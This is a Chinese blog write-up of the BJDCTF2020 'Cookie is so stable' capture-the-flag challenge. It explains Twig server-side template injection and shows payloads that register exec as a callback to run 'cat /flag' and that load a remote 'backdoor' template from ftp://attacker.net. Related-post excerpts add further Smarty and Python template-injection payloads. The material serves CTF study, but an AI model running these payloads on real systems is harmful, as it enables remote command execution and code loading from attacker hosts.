[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入

最新推荐文章于 2025-03-07 22:36:51 发布
最新推荐文章于 2025-03-07 22:36:51 发布
阅读量732 收藏 3
点赞数 1
分类专栏: # Web安全 # Write Up # 凌晨四点起床刷题 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DARKNOTES/article/details/119013663
版权
本文详细介绍了PHP-Twig模板引擎中的安全漏洞,特别是如何利用Self.env属性进行远程文件包含和任意函数调用。通过注册回调函数和过滤器,可以实现命令执行。文中提供了解题思路和payload示例,并探讨了可能的利用方式,如文件包含和触发XSS。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BJDCTF2020]Cookie is so stable

PHP-Twig模板注入

参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933

通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含

{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}

利用getFilter函数中的危险函数call_user_func,我们可以实现任意函数调用

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
// 前半段的含义为将`exec`注册为回调函数,后半段为回调参数

源码为

public function getFilter($name)
  {
    ...
    // 遍历回调函数,以$name为参数
    foreach ($this->filterCallbacks as $callback) {
    if (false !== $filter = call_user_func($callback, $name)) {
      return $filter;
    }
  }
  return false;
}

// 注册回调函数,将回调函数名封装为数组
public function registerUndefinedFilterCallback($callable)
{
  $this->filterCallbacks[] = $callable;
}

解题

提示为看Cookie,在Flag页面提交ID后,可以在存储中看到Cookie添加了新的参数,

输入的回显,首先猜测为SSTI,

测试模板,

{{7*'7'}}
回显:49

Twig注入,因此我们构造payload读文件,

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

但是提交会过滤拦截,我们仅需修改COOKIE,然后刷新即可得到flag

补充:

测试模板引擎方法:

// Smarty
a{*comment*}b

// Mako
a{*comment*}b
${"z".join("ab")}

// Jinja2
{{7*7}}
{{7*'7'}}    ->   7777777

// Twig
{{7*7}}
{{7*'7'}}    ->    49

利用HTML探测注入点:

用户输入可作为代码执行

name=Heph4es
hello,Heph4es.

name=Heph4es</body>     <!--整体作为变量传入模板,但并不存在此变量,所以无法显示-->
hello,

name=Heph4es}}</body>   <!--变量被传入,但在}}封闭,</body>逃逸为普通HTML文本-->
hello,

延展:可能的利用方式

  • 触发文件包含
  • 构造XSS
  • 触发命令执行
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 2038
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[ctf web]SSTI PHP模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3879
PHP模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
[BJDCTF2020]Cookie is so stable 1(twig模板注入
weixin_45577185的博客
09-06 419
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 619
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
模板注入Twig
最新发布
2401_88743143的博客
03-07 1167
为了使用户界面与业务数据(内容)分离而产生的,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,再放到渲染函数里,生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
关于Twig
aetlypdlg_ys的博客
05-06 290
简单介绍下Twig sstiSSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句。
Twig模板为例浅学一手SSTI
蚁景网安学院
12-17 1387
什么是SSTISSTI:开局一张图,姿势全靠ySSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPAT...
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 767
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
Buuctf(Cookie is so stable
m0_64444909的博客
04-12 533
1.本题需要了解到服务端模板注入攻击,SSTI里的Twig攻击。 这里大家要想详细了解可以查看这里的两篇博客 智慧门 安全门 测试为Twig还是jinja2模块的方法: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 2.尝试输入以后发现本题为Twig模块 3.Twig模块的payload自己记录下来,下次需要直接复制即可 PS: 先要把exec() 作为回调函数传进去就能实现命令执行了 (1)首先要先查看id,用BP抓包放包即可
2021-07-20 [BJDCTF2020]Cookie is so stable 知识点:SSTI Twig Cookie注入
m0_51326092的博客
07-20 391
** [BJDCTF2020]Cookie is so stable ** ** 前言: ** 不得不说又是膜拜众大佬的一天,题目对于萌新来说实在是难啊,只能搜寻wp加了解知识点边学边做了o(╥﹏╥)o BUU实现题目复现,尽管题目写着cookie,但是重点却不是这 ̄□ ̄||。 知识点:SSTITwig),cookie注入 ** 前置知识: ** 主要就是需要了解SSTI,具体解决Twig的。 附上大佬的链接,以下两篇文章都比较详细的讲了不同类型的SSTI,讲的是针不搓! 一篇文章带你理解漏洞之SSTI
SSTI注入————phpSSTI
wwwwyyyrre的博客
06-04 1418
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
服务端模版注入漏洞检测payload整理
weixin_30528371的博客
04-07 392
服务端模版注入漏洞产生的根源是将用户输入的数据被模版引擎解析渲染可能导致代码执行漏洞 下表涵盖了java,php,python,javascript语言中可能使用到的模版引擎,如果网站存在服务端模版注入在能回显的情况下会将验证栏的数据当模版执行,利用引擎提供的功能进行了计算大部分执行结果都会变成1522756。 模版引擎 语言 验证 代码执行 盲检测 ...
SSTI相关总结 (smarty/twig)
桃雾雨Rain的博客
01-30 1037
SSTI在用户可控的地方可能发生。 一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ
模板注入总结(SSTI)
qq_44657899的博客
02-14 5690
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
Twig 扩展库教程
gitblog_00470的博客
09-12 290
Twig 扩展库教程 Twig-extensions 项目地址: https://gitcode.com/gh_mirrors/twi/Twig-extensions 项目...
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1067
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
渗透测试练习题解析 4(CTF web)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-18 1911
这个其实挺难想到的,开始我也没想到,看了大佬 wp 才知道,因为前面有个地方干扰到我了,这一串我前面试了很多又是解码又是转图片转文件都没解出来,我以为这个位置的数据没什么用,导致后面没去理这块地方(没猜错的话应该是这个熊猫图的编码,不过不知道为什么转码转不出来)来查看当前目录所有文件名,但是 scandir('.') 包含参数了,不符合条件,所以需要使用别的函数来替代。),使其满足三个 if 条件中的一个,从而执行 $flag 得到 flag,而不是说要绕过三个 if ,去执行最后一行代码,这是不现实的。
Mac中Twig模版安装与SSTI漏洞学习
2302_81156108的博客
09-11 1546
学习SSTI的一些列心得体会,望对大家有用。
vulhub靶场教程 flask/ssti
12-09
vulhub靶场是一个专注于网络安全渗透测试和漏洞利用的平台,其中可以通过各种漏洞学习到不同的攻击技术。这次我们来讨论vulhub靶场中的一个特定教程:flask/ssti。 在flask/ssti教程中,我们将学习到的是Flask应用程序中的服务器端模板注入(Server-side Template Injection, SSTI)漏洞。这种漏洞的出现是由于Flask应用程序在渲染服务器端模板时没有适当的过滤和限制用户输入的内容,导致恶意用户可以在模板中执行任意的代码。这种漏洞的潜在风险非常高,攻击者可以利用它们执行代码,获取敏感信息甚至在服务器上执行任意命令。 在vulhub靶场中,我们将通过一个具体的示例来演示flask/ssti漏洞的利用。首先,我们需要安装所需的环境,包括Docker和Python;接下来,我们将根据教程提供的源代码和构建脚本,构建和启动一个漏洞应用程序;然后,我们将尝试在应用程序的输入框中输入一些特定代码,以执行任意的命令或获取敏感信息。 通过这个教程,我们可以了解到服务器端模板注入漏洞的原理和危害,并且学习到如何通过构造恶意输入来利用这种漏洞。同时,了解到安全开发中对用户输入的过滤和限制的重要性,以及如何防止和修复这种漏洞。 总之,vulhub靶场中的flask/ssti教程为我们提供了一个实践学习服务器端模板注入漏洞的机会,通过理论和实践相结合的方式,帮助我们更好地了解和掌握网络安全领域中的渗透测试和漏洞利用技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值